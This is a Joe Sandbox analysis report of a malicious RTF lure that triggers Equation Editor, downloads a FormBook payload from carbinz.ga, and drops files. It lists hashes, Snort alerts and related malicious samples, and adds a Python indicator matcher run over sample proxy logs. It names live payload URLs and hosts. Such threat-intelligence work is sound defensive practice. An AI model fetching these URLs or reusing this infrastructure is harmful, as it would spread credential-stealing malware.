
Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.239.243.112 | carbinz.ga | Moldova Republic of | 55933 | CLOUDIE-AS-APCloudieLimitedHK | true
184.168.131.241 | centerstageacademyaz.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 432651
Start date: 10.06.2021
Start time: 16:21:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: AWB00028487364 -000487449287.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@10/12@5/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24% (good quality ratio 22.8%)
• Quality average: 76.6%
• Quality standard deviation: 28.2%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 142.250.180.211
• Excluded domains from analysis (whitelisted): ghs.google.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big; too many NtQueryAttributesFile calls found

Simulations

Behavior and APIs

Time | Type | Description
16:21:36 | API Interceptor | 32x Sleep call for process: EQNEDT32.EXE modified
16:21:40 | API Interceptor | 103x Sleep call for process: prosper3512.exe modified
16:22:15 | API Interceptor | 160x Sleep call for process: control.exe modified
16:22:55 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match: 185.239.243.112

Associated Sample Name / URL | Detection | Context
Order10 06 2021.doc | malicious | carbinz.ga/modex/macsx.exe
PO210530_332641.doc | malicious | carbinz.ga/modex/wealthx.exe
NEW ORDER Ref PO-298721.doc | malicious | carbinz.gq/modex/catx.exe
Payment Advice.doc | malicious | carbinz.gq/modex/canux.exe
Kangean PO.doc | malicious | carbinz.gq/modex/liquidx.exe
ENQUIRY - J3902 Hollow Section.doc | malicious | vespang.ml/benp/unholy/fadaa/AmhNUkkKoGogl9g.exe
PO_7067.doc | malicious | vespang.ml/benp/unholy/djj/qTRPobspXvlwT1l.exe
Ball,Globe,plug valve spec.doc | malicious | vespang.ml/benp/unholy/jap/k0lzSkgsBCEeffT.exe
Purchase Order.xlsx | malicious | vespang.ml/vanal/tesy.scr
SwiftMt103.xlsx | malicious | carbinz.gq/modex/kellyx.exe
RFQ B 11JU2021.doc | malicious | vespang.ml/benp/jam/admin/UKq69QoX4veK4Up.exe
Ball, Globe, plug, Relief and Check valve Spec..doc | malicious | vespang.ml/benp/jam/omas/skMdx992wfqPuLs.exe
RFQ1.doc | malicious | carbinz.gq/modex/nzex.exe
EBE2101320.xlsx | malicious | carbinz.gq/modex/chungx.exe
Purchase order.doc | malicious | carbinz.gq/modex/kamix.exe
000367828992.doc | malicious | carbinz.gq/modex/kdotx.exe
SCAN_20161017_151638921_002.xlsx | malicious | carbinz.gq/modex/templex.exe
SIGNED CONTRACT.xlsx | malicious | carbinz.gq/modex/kellyx.exe
lX5zXPa23V.xlsx | malicious | carbinz.gq/modex/sirt.exe
IQ4lblwCjQ.exe | malicious | vunachiimpex.xyz/buta/vuga.exe

Domains

Match: carbinz.ga

Associated Sample Name / URL | Detection | Context
Order10 06 2021.doc | malicious | 185.239.243.112
PO210530_332641.doc | malicious | 185.239.243.112

ASN

Match: AS-26496-GO-DADDY-COM-LLC (US)

Associated Sample Name / URL | Detection | Context
619wGDCTZA.exe | malicious | 23.229.215.137
Documents_13134976_1377491379.xlsb | malicious | 107.180.50.232
#U00a0Import Custom Duty invoice & its clearance documents.exe | malicious | 184.168.131.241
Payment receipt MT103.exe | malicious | 184.168.131.241
research-531942606.xlsb | malicious | 72.167.211.83
research-121105165.xlsb | malicious | 72.167.211.83
research-76934760.xlsb | malicious | 72.167.211.83
research-1960540844.xlsx | malicious | 72.167.211.83
research-1110827633.xlsb | malicious | 72.167.211.83
DocumentScanCopy2021_pdf.exe | malicious | 148.66.138.158
New Order.exe | malicious | 184.168.131.241
DocumentScanCopy202_pdf.exe | malicious | 148.66.138.158
NEW ORDER ZIP.exe | malicious | 184.168.131.241
oVA5JBAJutcna88.exe | malicious | 184.168.131.241
qXDtb88hht.exe | malicious | 184.168.131.241
a8eC6O6okf.exe | malicious | 184.168.131.241
Telex_Payment.exe | malicious | 184.168.131.241
QyKNw7NioL.exe | malicious | 184.168.131.241
Payment_Advice.exe | malicious | 184.168.131.241
SOA #093732.exe | malicious | 184.168.131.241

Match: CLOUDIE-AS-AP Cloudie Limited (HK)

Associated Sample Name / URL | Detection | Context
Order10 06 2021.doc | malicious | 185.239.243.112
PO210530_332641.doc | malicious | 185.239.243.112
NEW ORDER Ref PO-298721.doc | malicious | 185.239.243.112
Payment Advice.doc | malicious | 185.239.243.112
Kangean PO.doc | malicious | 185.239.243.112
ENQUIRY - J3902 Hollow Section.doc | malicious | 185.239.243.112
PO_7067.doc | malicious | 185.239.243.112
Ball,Globe,plug valve spec.doc | malicious | 185.239.243.112
Purchase Order.xlsx | malicious | 185.239.243.112
SwiftMt103.xlsx | malicious | 185.239.243.112
RFQ B 11JU2021.doc | malicious | 185.239.243.112
Ball, Globe, plug, Relief and Check valve Spec..doc | malicious | 185.239.243.112
RFQ1.doc | malicious | 185.239.243.112
EBE2101320.xlsx | malicious | 185.239.243.112
Purchase order.doc | malicious | 185.239.243.112
000367828992.doc | malicious | 185.239.243.112
SCAN_20161017_151638921_002.xlsx | malicious | 185.239.243.112
SIGNED CONTRACT.xlsx | malicious | 185.239.243.112
lX5zXPa23V.xlsx | malicious | 185.239.243.112
IQ4lblwCjQ.exe | malicious | 185.239.243.112

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll

Associated Sample Name / URL | Detection
090049000009000.exe | malicious
dYy3yfSkwY.exe | malicious
PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx | malicious
Purchase Order Price List 061021.xlsx | malicious
Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious
UGGJ4NnzFz.exe | malicious
Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious
3arZKnr21W.exe | malicious
Shipping receipt.exe | malicious
New Order TL273723734533.pdf.exe | malicious
YZ8OvkljWm.exe | malicious
U03c2doc.exe | malicious
QUOTE061021.exe | malicious
PAYMENT CONFIRMATION.exe | malicious
PO187439.exe | malicious
090009000000090.exe | malicious
NEWORDERLIST.exe | malicious
00404000004.exe | malicious
40900900090000.exe | malicious
INVO090090202.exe | malicious
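The Context tables above are most useful as a pivot set: the payload host 185.239.243.112, the carbinz.ga / carbinz.gq / vespang.ml domains and the /modex/<name>x.exe download paths recur across many unrelated lure documents. The following is an added example, not part of the Joe Sandbox report, that turns those indicators into a matcher and runs it over constructed proxy-log lines. The log format, the sample lines and the /modex/ path regex are assumptions made here for illustration; only the IP, domains and URLs come from the report.

```python
"""
Added example (not from the Joe Sandbox report): match the infrastructure
listed in the report's Context tables against proxy-log lines.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators copied from the Context tables plus this sample's IE Cache URL.
IOC_IPS = {"185.239.243.112"}
IOC_DOMAINS = {"carbinz.ga", "carbinz.gq", "vespang.ml", "vunachiimpex.xyz"}
IOC_URLS = {
    "http://carbinz.ga/modex/prosperx.exe",
    "http://carbinz.ga/modex/macsx.exe",
    "http://carbinz.gq/modex/kellyx.exe",
}
# Assumption: the campaign names payloads <word>x.exe under /modex/, so a path
# pattern catches the next variant before its exact URL is known.
PAYLOAD_PATH = re.compile(r"^/modex/[a-z0-9]+x\.exe$", re.IGNORECASE)


def domain_matches(host: str) -> bool:
    """True for an IOC domain or a subdomain of one; the leading dot in the
    suffix test is what keeps 'notcarbinz.ga' from matching 'carbinz.ga'."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def classify_url(url: str) -> list:
    """Return the indicator types that fire for one URL, in a stable order."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").rstrip(".")   # urlsplit lower-cases and strips the port
    hits = []
    try:
        if str(ipaddress.ip_address(host)) in IOC_IPS:
            hits.append("ip")
    except ValueError:                           # not an IP literal: treat as a name
        if domain_matches(host):
            hits.append("domain")
    if url.lower().rstrip("/") in {u.lower() for u in IOC_URLS}:
        hits.append("url")
    if PAYLOAD_PATH.match(parts.path or ""):
        hits.append("payload-path")
    return hits


# Constructed log lines (assumed "<ts> <client> <method> <url> <status>" shape).
SAMPLE_LOG = """\
2021-06-11T16:22:40Z 10.0.0.7 GET http://carbinz.ga/modex/prosperx.exe 200
2021-06-11T16:22:41Z 10.0.0.7 GET http://www.carbinz.gq/modex/newx.exe 200
2021-06-11T16:22:42Z 10.0.0.7 GET http://185.239.243.112/benp/unholy/x.exe 200
2021-06-11T16:22:43Z 10.0.0.9 GET https://example.com/modex/ 200
2021-06-11T16:22:44Z 10.0.0.9 GET http://notcarbinz.ga/modex/prosperx.exe 200
"""


def scan_log(text: str) -> list:
    """Return (client, url, hits) for every line with at least one indicator hit."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        hits = classify_url(fields[3])
        if hits:
            findings.append((fields[1], fields[3], hits))
    return findings


if __name__ == "__main__":
    for client, url, hits in scan_log(SAMPLE_LOG):
        print(f"{client} -> {url}: {', '.join(hits)}")
```

The exact-URL and IP hits are the high-confidence tier; the domain suffix test and the path regex are the fuzzy tier that will also fire on the last constructed line (an unrelated host using the same path shape), which is the usual trade-off when pivoting on a naming convention rather than an indicator.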

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):245650
                                                                                                                                                                                                Entropy (8bit):7.92465625934964
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:DQIURTXJ+McCmF7tC1eb4lhkULBwRLuJTqDW2CLd+d/Lpz3JAdFu4V65bRvSC5aL:Ds9cCmF5SnwvmLd+d/FcU4Y5bRvbRAaa
MD5:CB4947E5C78ADA624D22C28EE9079871
SHA1:EB2C2D329E9BE0B3A74582A4FD9C257BC795A690
SHA-256:02230FB80DB0FE0055730A0AF8B3A0C66A578B2C315206053B80BAE250C5561D
SHA-512:7582AED1984C65C550532AB4A97D6BC5BC45BFCEEACDF329467B39667DBCAAA6A28175AA29FEF30146E16CBDAE903C5381B3D1EA47888F8D29B9F4119A581B26
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 30%
Reputation:low
IE Cache URL:http://carbinz.ga/modex/prosperx.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):4096
Entropy (8bit):3.203168596326184
Encrypted:false
SSDEEP:96:F0GA1XaaamUAmjWyP7S01zQ80xvbxkP2oM+YgQen2SiayuA:F4a+WL7S0pQ9xy2oM+9KSiayZ
MD5:961E15249B83098427A134862446FBDA
SHA1:9ED15A70F1EA0C15F34BAC9B107A14DBE497EAA0
SHA-256:EAE1C321425CE1D5E17A989FC60B78614F8D7EEAB5428879B44B8CB160D3F306
SHA-512:29392924BED4046AE45233BBD06A62FBE4B7F28DF56B7C0A8406160B2A2DA5F807B50B5BF5BBA0CFEB94D4CB7AC8E368A5B0D289792E508B9415DF2630F4C52E
Malicious:false
Reputation:low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55594574-8E09-401E-A760-1A1C7B299BE3}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file

C:\Users\user\AppData\Local\Temp\02vqprgl0atfidc
Process:C:\Users\user\AppData\Roaming\prosper3512.exe
File Type:data
Category:dropped
Size (bytes):185856
Entropy (8bit):7.998940517618347
Encrypted:true
SSDEEP:3072:sGXmBfAYT/4RnQPu5PBTgJApkOdFuKxnZMfSWVgVBratxWRHkFIhFQ:sbVZanguBdgJ2JdF/ZMqNbatxWREr
MD5:378DDC5CCA93C62AF29C52E3A139BB7A
SHA1:04C1B1F9C5AF921764E29E654D2D87E80D47C470
SHA-256:7AFCBE7E43FFCFC7268EFAF45629E6B6ED931145C9E5E820D60C5C9B50B0A1C5
SHA-512:977D9A3F41B3AE1D5ADC32926F522BDAB3A77A5472C0A47E63565D8CF6EAEC98C94A3776EA21538E4AFB122F1046F9BB916375B5B632889FFC8ED3430BB0360A
Malicious:false
Reputation:low

C:\Users\user\AppData\Local\Temp\nsu2B37.tmp
Process:C:\Users\user\AppData\Roaming\prosper3512.exe
File Type:data
Category:dropped
Size (bytes):278770
Entropy (8bit):7.448079444634977
Encrypted:false
SSDEEP:6144:OtbVZanguBdgJ2JdF/ZMqNbatxWREwXeQumQ4T3t:qINkc7RTVXeQued
MD5:C4CB16A32F9F83E70EAE2EDB6FD01FF3
SHA1:9E86174F2952237E5170B532A69BC080FCD59765
SHA-256:C8FE712473694B00B45F2AC8C83E57C0527751C6BA118E2A95F3F5B699B7EE57
SHA-512:8D9FC4DB04C2538B792F720A183A337043F77A846B7A71F3D66405C15F975D98CFF7E63ADDD2CB677454765A7D3C2295E522457DB6A479F7F84753C3F4E119CF
Malicious:false
Reputation:low

C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll
Process:C:\Users\user\AppData\Roaming\prosper3512.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.855045165595541
Encrypted:false
SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 090049000009000.exe, Detection: malicious
• Filename: dYy3yfSkwY.exe, Detection: malicious
• Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
• Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: UGGJ4NnzFz.exe, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: 3arZKnr21W.exe, Detection: malicious
• Filename: Shipping receipt.exe, Detection: malicious
• Filename: New Order TL273723734533.pdf.exe, Detection: malicious
• Filename: YZ8OvkljWm.exe, Detection: malicious
• Filename: U03c2doc.exe, Detection: malicious
• Filename: QUOTE061021.exe, Detection: malicious
• Filename: PAYMENT CONFIRMATION.exe, Detection: malicious
• Filename: PO187439.exe, Detection: malicious
• Filename: 090009000000090.exe, Detection: malicious
• Filename: NEWORDERLIST.exe, Detection: malicious
• Filename: 00404000004.exe, Detection: malicious
• Filename: 40900900090000.exe, Detection: malicious
• Filename: INVO090090202.exe, Detection: malicious
Reputation:moderate, very likely benign file

C:\Users\user\AppData\Local\Temp\wkxohdeyqvvyr
Process:C:\Users\user\AppData\Roaming\prosper3512.exe
File Type:data
Category:dropped
Size (bytes):56657
Entropy (8bit):4.975811547605918
Encrypted:false
SSDEEP:1536:5usA23WeP0CJgK679CbFutzrcnrz42c9nvpVid:012meP0Ikuwtvcz4pBWd
MD5:33CC7C93858999843488542395770601
SHA1:D57862368225F9240C279B0C1C1FA9BA7EB4E8CC
SHA-256:F0738E409A7008B653A4E5C86D90CC73021988D59CAE648772305C41D6668BB1
SHA-512:23F7DA5A861CAB4D0F06174BD78978F325B1D19DCECA6ED7A520B7957529B7D1A3EC1CC838EC140C426B0C64784B744AF6E3A4BB4C4514FE30A40E89CDEFFCAF
Malicious:false
                                                                                                                                                                                                Preview: U............@...8.A.....B.....C...i.D...i.E...l.F.....G...=.H.....I.....J...e.K...i.L...l.M.....N...=.O.....P...=.Q.....R.....S...i.T...i.U.....V.....W...m.X...i.Y.....Z...\.[.....\.....]...i.^...i._...i.`.....a...\.b.....c.....d...\.e...I.f.....g.....h.....i...i.j...U.k.....l.....m...\.n...I.o.....p...i.q...i.r.....s...\.t...I.u...).v.....w...\.x...I.y.....z...\.{.....|...!.}.....~...\.............................\...........%.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\...........)...........\.................\...........!...........\.............................\...........a.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\......
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AWB00028487364 -000487449287.LNK
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Jun 10 22:21:34 2021, length=5618, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2208
                                                                                                                                                                                                Entropy (8bit):4.504457080244423
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8i/XTFGqZNGoynOOQh2i/XTFGqZNGoynOOQ/:8i/XJGqvknOOQh2i/XJGqvknOOQ/
                                                                                                                                                                                                MD5:A59ECB3BCA5A3BC022B2EC74C9164210
                                                                                                                                                                                                SHA1:BEA16F2EA9F23D6D8A2472C2B77CC762C4E893A5
                                                                                                                                                                                                SHA-256:878B3049BA993CEAFFC51E70C36DA541C055729F690BB433E2ED57F0D04DBE62
                                                                                                                                                                                                SHA-512:D0994A05C54EF0F440B3E19D1CD660A9D80D94378BB9D65D9C5D948039D21740E0AD1AD17E82758CF545FAE433EB95D5B78A9EDA38A2B0FBC3DAB30E18DF0A06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: L..................F.... ...]....{..]....{...H.ZO^...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .AWB000~1.DOC..n.......Q.y.Q.y*...8.....................A.W.B.0.0.0.2.8.4.8.7.3.6.4. .-.0.0.0.4.8.7.4.4.9.2.8.7...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\AWB00028487364 -000487449287.doc.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.W.B.0.0.0.2.8.4.8.7.3.6.4. .-.0.0.0.4.8.7.4.4.9.2.8.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):122
                                                                                                                                                                                                Entropy (8bit):4.2017742776002445
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:M17VV/bFtTLUYC80//bFtTLUYCmX17VV/bFtTLUYCv:MNjFtHUYa/jFtHUYljFtHUYs
                                                                                                                                                                                                MD5:1786A2BB4886680139145E9EA52E593A
                                                                                                                                                                                                SHA1:4740E8C7C6E54905E61FAB57C2C16BB29FC4DA9A
                                                                                                                                                                                                SHA-256:97E6B642156387742F3D7C4063743B06D4931BED1434D2649FCC6438A0FF9AAD
                                                                                                                                                                                                SHA-512:9E5C87185924DD711E0624345EBDCE68A976804019D5DD2C60F6A7B3192FF87A2824A8E8E9B7D24C94BBEB25A62951657AA52A2FE3BE087EC9C3EE86F41AD2F1
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: [doc]..AWB00028487364 -000487449287.LNK=0..AWB00028487364 -000487449287.LNK=0..[doc]..AWB00028487364 -000487449287.LNK=0..
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.431160061181642
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):245650
                                                                                                                                                                                                Entropy (8bit):7.92465625934964
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:DQIURTXJ+McCmF7tC1eb4lhkULBwRLuJTqDW2CLd+d/Lpz3JAdFu4V65bRvSC5aL:Ds9cCmF5SnwvmLd+d/FcU4Y5bRvbRAaa
                                                                                                                                                                                                MD5:CB4947E5C78ADA624D22C28EE9079871
                                                                                                                                                                                                SHA1:EB2C2D329E9BE0B3A74582A4FD9C257BC795A690
                                                                                                                                                                                                SHA-256:02230FB80DB0FE0055730A0AF8B3A0C66A578B2C315206053B80BAE250C5561D
                                                                                                                                                                                                SHA-512:7582AED1984C65C550532AB4A97D6BC5BC45BFCEEACDF329467B39667DBCAAA6A28175AA29FEF30146E16CBDAE903C5381B3D1EA47888F8D29B9F4119A581B26
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\Desktop\~$B00028487364 -000487449287.doc
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.431160061181642
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 5.218652093822829
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: AWB00028487364 -000487449287.doc
File size: 5618
MD5: 1ec3b91ed189962f5dbab025347f11a9
SHA1: 4abe9e2631f5c2ef5e3c979e5845b460e8448658
SHA256: 472ee2b8c300718535b7c997c3a7884c125bb697feb4969a3002355d04e4050c
SHA512: a9d44e69f0b1182519fe3610e856b7cb46ebadb34370240753168bac4921f66e21f9b49030b83fa8b4503b8823c23b8f18b661004a90a9e5f236e2950d7b048f
SSDEEP: 96:WFm/QH53bUFmB2/wMGbF8LAGUSeJqWHUeeKuInmNzPlq2llPIEhIOaU6tKwFjRC+:WxrU0BcGaYqWHUeeKuIizVDIEqOqKSRF
File Content Preview: {\rtf7975'_-!#&.]~/[!5^^)?.@8'!?9==985~_..#9@.5?[=!$:??',2-.(]_@%@?8.%|;.;['6-,,@&4>$%^=726?;('8^,7%))91.$9#>4(..5)6.8&:^41<59|0]`!7*!].;..+?.$5#?612+>?.=,<?~)(?-7(]+.>!!-@,!'.?&[,@._.@+].*9?^;.~(288>.(3|#5|6+670./@60)*%%&:9?%!.!?`=%-@0|?<:(!_3-<0`]888,4.

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 00000064h | 1 | | | | | | | no
1 | 000005FDh | 2 | embedded | eqUATion.3 | 1417 | | | | no

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/10/21-16:23:26.694312 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 142.250.180.211
06/10/21-16:23:26.694312 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 142.250.180.211
06/10/21-16:23:26.694312 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 142.250.180.211

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 10, 2021 16:22:07.813637972 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.864141941 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.864238977 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.864707947 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.915879011 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.916915894 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.916939020 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
